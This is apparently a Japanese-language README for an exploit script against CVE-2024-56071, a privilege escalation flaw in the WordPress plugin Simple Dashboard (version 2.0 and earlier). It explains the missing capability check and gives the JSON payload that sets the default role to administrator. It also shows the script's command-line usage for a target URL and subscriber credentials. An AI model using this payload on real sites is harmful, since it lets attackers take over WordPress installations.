
Simple Dashboard <= 2.0 - 未認証の権限昇格
WordPress 用プラグイン Simple Dashboard は、バージョン 2.0 を含むすべてのバージョンにおいて、権限昇格の脆弱性の影響を受けます。
これにより、認証されていない攻撃者が管理者権限へと権限を昇格させることが可能になります。
この脆弱性は、機能チェックの欠如(current_user_can() がないこと)によるものですが、WordPress コアは /wp-admin/ を認証されていないアクセスから保護しています。
➡️ つまり、この脆弱性は ログイン後にのみ悪用可能 ですが、ユーザーに特別な権限は必要ありません。
購読者(Subscriber) であっても、この脆弱性を悪用して WordPress の重要なオプションを変更できます。
以下のような JSON ファイルをアップロードすることで悪用します:
{ "default_role": "administrator" }
以後、新しく登録するユーザーは自動的に Administrator(管理者) ロールが適用されます。
usage: CVE-2024-56071.py [-h] -u URL -U USERNAME -P PASSWORD
Exploit for Simple Dashboard <= 2.0 - Privilege Escalation # By Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress base URL (e.g., http://target.com/wordpress)
-U, --username USERNAME WordPress username to log in
-P, --password PASSWORD Password for the WordPress user
By: Nxploited | Khaled Alenazi